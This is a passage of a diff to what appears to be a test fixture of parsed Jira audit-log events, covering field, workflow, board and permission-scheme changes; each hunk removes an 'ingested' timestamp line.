created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Story Points\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Measurement of complexity and/or size of a requirement.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Number Field\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539629,\"nano\":88000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2452,7 +2419,6 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-24T00:58:20.169956543Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Done\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"Work has been completed on this issue.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":534000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2517,7 +2483,6 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-24T00:58:20.169957426Z", "original": "{\"affectedObjects\":[{\"id\":\"10001\",\"name\":\"Won't Do\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"This issue won't be actioned.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":535000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2582,7 +2547,6 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-24T00:58:20.169958174Z", "original": "{\"affectedObjects\":[{\"id\":\"10002\",\"name\":\"Duplicate\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"The problem is a duplicate of an existing issue.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":536000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2647,7 +2611,6 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-24T00:58:20.169958956Z", "original": "{\"affectedObjects\":[{\"id\":\"10003\",\"name\":\"Cannot Reproduce\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"All attempts at reproducing this issue failed, or not enough information was available to reproduce the issue. Reading the code produces no clues as to why this behavior would occur. If more information appears later, please reopen the issue.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":537000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2712,7 +2675,6 @@ }, "event": { "action": "jira.auditing.workflow.created", - "ingested": "2021-12-24T00:58:20.169959724Z", "original": "{\"affectedObjects\":[{\"id\":\"Software Simplified Workflow for Project TEST\",\"name\":\"Software Simplified Workflow for Project TEST\",\"type\":\"WORKFLOW\"}],\"auditType\":{\"action\":\"Workflow created\",\"actionI18nKey\":\"jira.auditing.workflow.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"admin.workflowtransition.transition\",\"key\":\"Transition\",\"to\":\"Create (To Do), To Do (To Do), In Progress (In Progress), Done (Done)\"},{\"i18nKey\":\"common.words.status\",\"key\":\"Status\",\"to\":\"To Do, In Progress, Done\"},{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Software Simplified Workflow for Project TEST\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow is managed internally by Jira Software. Do not manually modify this workflow.\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":710000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2792,7 +2754,6 @@ }, "event": { "action": "jira.auditing.workflow.scheme.created", - "ingested": "2021-12-24T00:58:20.169960475Z", "original": "{\"affectedObjects\":[{\"id\":\"10100\",\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Workflow scheme created\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"TEST: Software Simplified Workflow Scheme\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow scheme is managed internally by Jira Software. Do not manually modify this workflow scheme.\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":732000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2862,7 +2823,6 @@ }, "event": { "action": "jira.auditing.workflow.scheme.added.to.project", - "ingested": "2021-12-24T00:58:20.169961330Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"10100\",\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Workflow scheme added to project\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.added.to.project\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":746000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2925,7 +2885,6 @@ }, "event": { "action": "jira.auditing.filter.created", - "ingested": "2021-12-24T00:58:20.169962059Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Filter for TEST board\",\"type\":\"FILTER\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Filter created\",\"actionI18nKey\":\"jira.auditing.filter.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"filters\",\"categoryI18nKey\":\"jira.auditing.category.filters\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Filter for TEST board\"},{\"from\":\"\",\"i18nKey\":\"common.concepts.description\",\"key\":\"Description\"},{\"from\":\"\",\"i18nKey\":\"common.concepts.owner\",\"key\":\"Owner\",\"to\":\"test.user\"},{\"from\":\"[]\",\"i18nKey\":\"common.concepts.shared.with\",\"key\":\"Shared with\",\"to\":\"[Project: test (VIEW)]\"},{\"from\":\"\",\"i18nKey\":\"jira.jql.query\",\"key\":\"JQL Query\",\"to\":\"{project = \\\"TEST\\\"} order by Rank ASC\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":887000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3020,7 +2979,6 @@ }, "event": { "action": "Board created", - "ingested": "2021-12-24T00:58:20.169962893Z", "original": "{\"affectedObjects\":[{\"id\":\"1\",\"name\":\"TEST board\",\"type\":\"BOARD\"},{\"id\":\"1\",\"name\":\"TEST board\",\"type\":\"BOARD\"}],\"auditType\":{\"action\":\"Board created\",\"actionI18nKey\":\"Board created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"boards\",\"categoryI18nKey\":\"jira.auditing.category.boards\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":72000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3083,7 +3041,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.created", - "ingested": "2021-12-24T00:58:20.169963686Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme created\",\"actionI18nKey\":\"jira.auditing.permission.scheme.created\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Default software scheme\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Default scheme for Software projects.\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":142000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3153,7 +3110,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169964409Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Browse Projects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":151000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3223,7 +3179,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169965156Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":163000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3293,7 +3248,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169965886Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":165000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3363,7 +3317,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169966621Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Assign Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":166000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3433,7 +3386,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169967408Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Resolve Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":168000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3503,7 +3455,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169968139Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Add Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":171000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3573,7 +3524,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169968870Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":173000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3648,7 +3598,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169969767Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Assignable User\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":174000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3718,7 +3667,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169970547Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Close Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":176000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3788,7 +3736,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169971332Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Attachments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":178000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3858,7 +3805,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169972079Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Work On Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":180000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3928,7 +3874,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169972878Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Link Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":182000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3998,7 +3943,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169973672Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Administer Projects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":184000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4073,7 +4017,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169974467Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Move Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":187000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -4143,7 +4086,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169975263Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Schedule 